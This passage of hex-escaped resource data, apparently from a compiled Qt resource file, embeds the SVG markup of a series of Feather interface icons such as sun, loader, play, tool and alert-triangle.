\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x73\x75\x6e\x22\x3e\
\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\
\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x35\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\
\x22\x31\x32\x22\x20\x79\x31\x3d\x22\x31\x22\x20\x78\x32\x3d\x22\
\x31\x32\x22\x20\x79\x32\x3d\x22\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\
\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\
\x79\x31\x3d\x22\x32\x31\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x32\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x32\x32\x22\x20\x79\
\x31\x3d\x22\x34\x2e\x32\x32\x22\x20\x78\x32\x3d\x22\x35\x2e\x36\
\x34\x22\x20\x79\x32\x3d\x22\x35\x2e\x36\x34\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\
\x2e\x33\x36\x22\x20\x79\x31\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\
\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\x79\x32\x3d\x22\x31\
\x39\x2e\x37\x38\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\
\x6e\x65\x20\x78\x31\x3d\x22\x31\x22\x20\x79\x31\x3d\x22\x31\x32\
\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\x32\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x32\x33\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\
\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\
\x2e\x32\x32\x22\x20\x79\x31\x3d\x22\x31\x39\x2e\x37\x38\x22\x20\
\x78\x32\x3d\x22\x35\x2e\x36\x34\x22\x20\x79\x32\x3d\x22\x31\x38\
\x2e\x33\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\
\x65\x20\x78\x31\x3d\x22\x31\x38\x2e\x33\x36\x22\x20\x79\x31\x3d\
\x22\x35\x2e\x36\x34\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x37\x38\
\x22\x20\x79\x32\x3d\x22\x34\x2e\x32\x32\x22\x3e\x3c\x2f\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x55\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6d\x6f\x72\x65\x2d\
\x76\x65\x72\x74\x69\x63\x61\x6c\x22\x3e\x3c\x63\x69\x72\x63\x6c\
\x65\x20\x63\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x32\
\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\
\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\x32\x22\
\x20\x63\x79\x3d\x22\x35\x22\x20\x72\x3d\x22\x31\x22\x3e\x3c\x2f\
\x63\x69\x72\x63\x6c\x65\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\
\x78\x3d\x22\x31\x32\x22\x20\x63\x79\x3d\x22\x31\x39\x22\x20\x72\
\x3d\x22\x31\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\
\x73\x76\x67\x3e\
\x00\x00\x02\x66\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x6c\x6f\x61\x64\x65\
\x72\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\
\x20\x79\x31\x3d\x22\x32\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\x31\x3d\x22\
\x31\x38\x22\x20\x78\x32\x3d\x22\x31\x32\x22\x20\x79\x32\x3d\x22\
\x32\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\
\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\x20\x79\x31\x3d\x22\x34\
\x2e\x39\x33\x22\x20\x78\x32\x3d\x22\x37\x2e\x37\x36\x22\x20\x79\
\x32\x3d\x22\x37\x2e\x37\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\
\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x36\x2e\x32\x34\x22\
\x20\x79\x31\x3d\x22\x31\x36\x2e\x32\x34\x22\x20\x78\x32\x3d\x22\
\x31\x39\x2e\x30\x37\x22\x20\x79\x32\x3d\x22\x31\x39\x2e\x30\x37\
\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\
\x31\x3d\x22\x32\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\
\x3d\x22\x36\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x38\
\x22\x20\x79\x31\x3d\x22\x31\x32\x22\x20\x78\x32\x3d\x22\x32\x32\
\x22\x20\x79\x32\x3d\x22\x31\x32\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x34\x2e\x39\x33\x22\
\x20\x79\x31\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x78\x32\x3d\x22\
\x37\x2e\x37\x36\x22\x20\x79\x32\x3d\x22\x31\x36\x2e\x32\x34\x22\
\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x31\x36\x2e\x32\x34\x22\x20\x79\x31\x3d\x22\x37\x2e\x37\
\x36\x22\x20\x78\x32\x3d\x22\x31\x39\x2e\x30\x37\x22\x20\x79\x32\
\x3d\x22\x34\x2e\x39\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\
\x2f\x73\x76\x67\x3e\
\x00\x00\x01\xab\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x62\x61\x74\x74\x65\
\x72\x79\x2d\x63\x68\x61\x72\x67\x69\x6e\x67\x22\x3e\x3c\x70\x61\
\x74\x68\x20\x64\x3d\x22\x4d\x35\x20\x31\x38\x48\x33\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x2d\x32\x2d\x32\x56\x38\x61\x32\x20\
\x32\x20\x30\x20\x30\x20\x31\x20\x32\x2d\x32\x68\x33\x2e\x31\x39\
\x4d\x31\x35\x20\x36\x68\x32\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x20\x32\x20\x32\x76\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x31\x2d\x32\x20\x32\x68\x2d\x33\x2e\x31\x39\x22\x3e\x3c\x2f\x70\
\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x33\
\x22\x20\x79\x31\x3d\x22\x31\x33\x22\x20\x78\x32\x3d\x22\x32\x33\
\x22\x20\x79\x32\x3d\x22\x31\x31\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\x6f\x69\x6e\x74\
\x73\x3d\x22\x31\x31\x20\x36\x20\x37\x20\x31\x32\x20\x31\x33\x20\
\x31\x32\x20\x39\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\
\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x07\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x70\x6c\x61\x79\x22\
\x3e\x3c\x70\x6f\x6c\x79\x67\x6f\x6e\x20\x70\x6f\x69\x6e\x74\x73\
\x3d\x22\x35\x20\x33\x20\x31\x39\x20\x31\x32\x20\x35\x20\x32\x31\
\x20\x35\x20\x33\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x67\x6f\x6e\x3e\
\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x3c\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x68\x65\x76\x72\
\x6f\x6e\x73\x2d\x75\x70\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\
\x65\x20\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x31\x20\
\x31\x32\x20\x36\x20\x37\x20\x31\x31\x22\x3e\x3c\x2f\x70\x6f\x6c\
\x79\x6c\x69\x6e\x65\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\
\x70\x6f\x69\x6e\x74\x73\x3d\x22\x31\x37\x20\x31\x38\x20\x31\x32\
\x20\x31\x33\x20\x37\x20\x31\x38\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\
\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x82\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x74\x6f\x6f\x6c\x22\
\x3e\x3c\x70\x61\x74\x68\x20\x64\x3d\x22\x4d\x31\x34\x2e\x37\x20\
\x36\x2e\x33\x61\x31\x20\x31\x20\x30\x20\x30\x20\x30\x20\x30\x20\
\x31\x2e\x34\x6c\x31\x2e\x36\x20\x31\x2e\x36\x61\x31\x20\x31\x20\
\x30\x20\x30\x20\x30\x20\x31\x2e\x34\x20\x30\x6c\x33\x2e\x37\x37\
\x2d\x33\x2e\x37\x37\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x2d\
\x37\x2e\x39\x34\x20\x37\x2e\x39\x34\x6c\x2d\x36\x2e\x39\x31\x20\
\x36\x2e\x39\x31\x61\x32\x2e\x31\x32\x20\x32\x2e\x31\x32\x20\x30\
\x20\x30\x20\x31\x2d\x33\x2d\x33\x6c\x36\x2e\x39\x31\x2d\x36\x2e\
\x39\x31\x61\x36\x20\x36\x20\x30\x20\x30\x20\x31\x20\x37\x2e\x39\
\x34\x2d\x37\x2e\x39\x34\x6c\x2d\x33\x2e\x37\x36\x20\x33\x2e\x37\
\x36\x7a\x22\x3e\x3c\x2f\x70\x61\x74\x68\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\x8d\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x69\x67\x6e\
\x2d\x72\x69\x67\x68\x74\x22\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\
\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x30\x22\x20\x78\x32\
\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x30\x22\x3e\x3c\x2f\x6c\
\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\
\x22\x20\x79\x31\x3d\x22\x36\x22\x20\x78\x32\x3d\x22\x33\x22\x20\
\x79\x32\x3d\x22\x36\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\
\x69\x6e\x65\x20\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\
\x31\x34\x22\x20\x78\x32\x3d\x22\x33\x22\x20\x79\x32\x3d\x22\x31\
\x34\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\x3e\x3c\x6c\x69\x6e\x65\x20\
\x78\x31\x3d\x22\x32\x31\x22\x20\x79\x31\x3d\x22\x31\x38\x22\x20\
\x78\x32\x3d\x22\x37\x22\x20\x79\x32\x3d\x22\x31\x38\x22\x3e\x3c\
\x2f\x6c\x69\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x1a\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x63\x74\x69\x76\
\x69\x74\x79\x22\x3e\x3c\x70\x6f\x6c\x79\x6c\x69\x6e\x65\x20\x70\
\x6f\x69\x6e\x74\x73\x3d\x22\x32\x32\x20\x31\x32\x20\x31\x38\x20\
\x31\x32\x20\x31\x35\x20\x32\x31\x20\x39\x20\x33\x20\x36\x20\x31\
\x32\x20\x32\x20\x31\x32\x22\x3e\x3c\x2f\x70\x6f\x6c\x79\x6c\x69\
\x6e\x65\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x02\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x63\x69\x72\x63\x6c\
\x65\x22\x3e\x3c\x63\x69\x72\x63\x6c\x65\x20\x63\x78\x3d\x22\x31\
\x32\x22\x20\x63\x79\x3d\x22\x31\x32\x22\x20\x72\x3d\x22\x31\x30\
\x22\x3e\x3c\x2f\x63\x69\x72\x63\x6c\x65\x3e\x3c\x2f\x73\x76\x67\
\x3e\
\x00\x00\x01\xa8\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
\x65\x77\x42\x6f\x78\x3d\x22\x30\x20\x30\x20\x32\x34\x20\x32\x34\
\x22\x20\x66\x69\x6c\x6c\x3d\x22\x6e\x6f\x6e\x65\x22\x20\x73\x74\
\x72\x6f\x6b\x65\x3d\x22\x63\x75\x72\x72\x65\x6e\x74\x43\x6f\x6c\
\x6f\x72\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\
\x3d\x22\x32\x22\x20\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\
\x63\x61\x70\x3d\x22\x72\x6f\x75\x6e\x64\x22\x20\x73\x74\x72\x6f\
\x6b\x65\x2d\x6c\x69\x6e\x65\x6a\x6f\x69\x6e\x3d\x22\x72\x6f\x75\
\x6e\x64\x22\x20\x63\x6c\x61\x73\x73\x3d\x22\x66\x65\x61\x74\x68\
\x65\x72\x20\x66\x65\x61\x74\x68\x65\x72\x2d\x61\x6c\x65\x72\x74\
\x2d\x74\x72\x69\x61\x6e\x67\x6c\x65\x22\x3e\x3c\x70\x61\x74\x68\
\x20\x64\x3d\x22\x4d\x31\x30\x2e\x32\x39\x20\x33\x2e\x38\x36\x4c\
\x31\x2e\x38\x32\x20\x31\x38\x61\x32\x20\x32\x20\x30\x20\x30\x20\
\x30\x20\x31\x2e\x37\x31\x20\x33\x68\x31\x36\x2e\x39\x34\x61\x32\
\x20\x32\x20\x30\x20\x30\x20\x30\x20\x31\x2e\x37\x31\x2d\x33\x4c\
\x31\x33\x2e\x37\x31\x20\x33\x2e\x38\x36\x61\x32\x20\x32\x20\x30\
\x20\x30\x20\x30\x2d\x33\x2e\x34\x32\x20\x30\x7a\x22\x3e\x3c\x2f\
\x70\x61\x74\x68\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\
\x32\x22\x20\x79\x31\x3d\x22\x39\x22\x20\x78\x32\x3d\x22\x31\x32\
\x22\x20\x79\x32\x3d\x22\x31\x33\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x6c\x69\x6e\x65\x20\x78\x31\x3d\x22\x31\x32\x22\x20\x79\
\x31\x3d\x22\x31\x37\x22\x20\x78\x32\x3d\x22\x31\x32\x2e\x30\x31\
\x22\x20\x79\x32\x3d\x22\x31\x37\x22\x3e\x3c\x2f\x6c\x69\x6e\x65\
\x3e\x3c\x2f\x73\x76\x67\x3e\
\x00\x00\x01\x43\
\x3c\
\x73\x76\x67\x20\x78\x6d\x6c\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x20\x77\x69\x64\x74\x68\x3d\x22\x32\x38\
\x22\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x32\x38\x22\x20\x76\x69\
